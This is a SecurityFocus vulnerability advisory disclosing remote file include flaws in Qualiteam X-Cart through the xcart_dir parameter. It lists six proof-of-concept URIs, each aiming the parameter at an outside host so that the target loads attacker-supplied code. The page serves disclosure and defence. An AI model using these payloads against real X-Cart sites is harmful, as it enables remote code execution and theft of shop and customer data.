Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/[xcart-path]/config.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/prepare.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/smarty.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/customer/product.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/provider/auth.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/admin/auth.php?xcart_dir=http://www.example2.com /[inject]?







 

Privacy Statement
Copyright 2009, SecurityFocus